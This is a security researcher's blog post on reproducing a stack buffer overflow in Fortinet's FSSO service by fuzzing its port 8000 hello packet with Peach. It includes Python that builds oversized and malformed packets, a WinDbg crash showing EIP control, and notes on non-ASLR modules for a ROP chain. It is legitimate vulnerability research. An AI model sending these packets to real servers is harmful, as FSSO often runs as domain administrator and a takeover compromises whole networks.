Last week Enrique Nissim of Core Security published an article called Analysis of a Remote Code Execution Vulnerability on Fortinet Single Sign On. Lately I’ve been using Déjà vu Security’s excellent Peach Fuzzer to find vulnerabilities, and I wanted to see how easy this one would be to reproduce.
First, I installed Wireshark, WinDbg, Peach 3 and FSSO 4.3.143 onto a Windows 2008 R2 server VM. While Windows 2008 R2 is 64-bit only, FSSO is always a 32-bit process, which should make writing the exploit simpler. Next, I loaded up a FortiGate VM and configured FSSO according to the documentation. All Fortinet products can be downloaded and trialed for 14 days, which makes vulnerability hunting a breeze, although you will have to set up an account first.
As indicated by Enrique’s article, FSSO communicates via TCP port 8000. A Wireshark capture shows the structure of the hello packet:
The capture shows the packet format as follows:
- A packet header, consisting of a 32-bit big-endian size field covering the whole packet (including the size field itself), a tag value of 80 and a type value of 06 (hex). This tag and type combination identifies a hello packet.
- A sequence of TLV-like structures, each with the same size, tag, type and value layout as the header.
- TLVs for the version, the serial number and an MD5 authentication hash.
Peach uses an XML file (a "Pit") to describe how to fuzz a target. The portion of the XML that describes the packet format is the data model. Other sections include a state model, which describes stateful protocols (here we only fuzz the hello packet, so the state model is trivial), an agent, which describes how to instrument the target (in this case attaching WinDbg to the FSSO service), and a test, which describes how to interface with the target (a TCP publisher on port 8000). The full Peach Pit can be found on github.
Running the Peach Pit is simple. I’ve installed Peach into the directory c:\peach on the Windows 2008 R2 VM. You can start fuzzing by copying the Pit into the Peach directory and running “peach.exe fsso.xml”.
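To make the capture description and the Pit's size relations concrete, here is an added example (my own illustration, not Fortinet's code and not the Pit itself) that builds a hello packet from the layout above, parses it back with the bounds checks a robust receiver would need, and applies the two mutations the fuzzer is effectively making: an oversized value with every size field re-derived, and a size field that lies about its length. The one-byte widths of the tag and type fields, the inner TLV tag/type numbers, and the sample version, serial and hash values are all assumptions; the page only gives the hello packet's own tag (80) and type (06).

```python
import struct

# Layout as described from the Wireshark capture: a 32-bit big-endian size
# counting the whole unit including itself, then a tag, a type, then the value.
# Assumption: tag and type are one byte each (the capture description does not
# state their widths).
HDR_FMT = ">IBB"
HDR_LEN = struct.calcsize(HDR_FMT)  # 6

HELLO_TAG, HELLO_TYPE = 0x80, 0x06  # from the page

# Hypothetical inner TLV identifiers: the page names the three TLVs but not
# their tag/type values, so these are placeholders for illustration only.
TLV_VERSION = (0x01, 0x01)
TLV_SERIAL = (0x02, 0x01)
TLV_MD5 = (0x03, 0x02)


def encode_unit(tag, typ, value):
    """Emit one size/tag/type/value unit; size covers the size field itself."""
    return struct.pack(HDR_FMT, HDR_LEN + len(value), tag, typ) + value


def build_hello(version, serial, md5_hex):
    """Hello packet: an outer unit whose value is three inner TLVs."""
    body = b"".join([
        encode_unit(*TLV_VERSION, version),
        encode_unit(*TLV_SERIAL, serial),
        encode_unit(*TLV_MD5, bytes.fromhex(md5_hex)),
    ])
    return encode_unit(HELLO_TAG, HELLO_TYPE, body)


def parse_units(buf):
    """Walk consecutive units, refusing any size that runs past the buffer.

    This is the check a hardened receiver needs. The 0x41414141 crash on the
    page is what you get when a receiver copies a value into a fixed-size
    stack buffer without a check like this."""
    units, off = [], 0
    while off < len(buf):
        if len(buf) - off < HDR_LEN:
            raise ValueError("truncated header at offset %d" % off)
        size, tag, typ = struct.unpack_from(HDR_FMT, buf, off)
        if size < HDR_LEN or off + size > len(buf):
            raise ValueError("bad size %d at offset %d" % (size, off))
        units.append((tag, typ, buf[off + HDR_LEN:off + size]))
        off += size
    return units


def parse_hello(pkt):
    """Return the inner TLVs of a hello packet as (tag, type, value) tuples."""
    (tag, typ, body), = parse_units(pkt)
    if (tag, typ) != (HELLO_TAG, HELLO_TYPE):
        raise ValueError("not a hello packet: tag=%02x type=%02x" % (tag, typ))
    return parse_units(body)


def is_well_formed(pkt):
    """True when every size field is consistent with the bytes present."""
    try:
        parse_hello(pkt)
        return True
    except ValueError:
        return False


def mutate_value(pkt, index, filler=b"A", length=1024):
    """Replace inner TLV `index` with `length` filler bytes and re-derive every
    size field, as Peach's size relation does. Sizes stay honest, so the
    mutation is purely an oversized value."""
    inner = parse_hello(pkt)
    tag, typ, _ = inner[index]
    inner[index] = (tag, typ, filler * length)
    body = b"".join(encode_unit(t, y, v) for t, y, v in inner)
    return encode_unit(HELLO_TAG, HELLO_TYPE, body)


def lie_about_size(pkt, claimed):
    """The other mutation class: keep the bytes, change only the outer size."""
    return struct.pack(">I", claimed) + pkt[4:]


if __name__ == "__main__":
    # Constructed sample values; the MD5 below is the hash of the empty string.
    pkt = build_hello(b"4.3.143", b"FSSO-CONSTRUCTED",
                      "d41d8cd98f00b204e9800998ecf8427e")
    print(pkt.hex())
    print(len(mutate_value(pkt, 0)), "bytes with a 1024-byte version value")
    print("size lie rejected:", not is_well_formed(lie_about_size(pkt, 10000)))
```

Sending `mutate_value(pkt, i)` for each TLV index with growing lengths over a TCP socket to port 8000 is the manual equivalent of the Pit's string mutators on the value fields; the size-field lie is what the Pit's numeric mutators on the size relation produce.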
After only 41 fuzz runs, I obtained the following crash in WinDbg:
(13f8.e54): Access violation - code c0000005 (first chance)
eax=fffffffe ebx=00000658 ecx=75e898da edx=1c781104 esi=ffffffff edi=1c7e2ce8
eip=41414141 esp=1cbbfe1c ebp=00000000 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
41414141 ??              ???
EIP is 0x41414141, i.e. the fuzzer's filler bytes: a textbook stack buffer overflow. To make matters worse, two modules loaded in the FSSO service do not use ASLR:
So we know we control EIP, and we know we have at least two modules loaded at fixed addresses. One of them is mapped at an address range containing no null bytes, which is perfect for a ROP chain.
FSSO usually runs as a domain administrator. If we’re able to exploit this service, we effectively have control over the entire network. While Fortinet might not be a household name like Cisco or Microsoft, Fortinet has sold over a million firewalls and FSSO is widely deployed. It is also quite likely that this service has other vulnerabilities, for example in the DCAgent protocol running on UDP port 8002 (which is also enabled by default). Next week I’ll demonstrate how to build a working Metasploit module for this vulnerability, and we’ll try some fuzzing of the DCAgent protocol.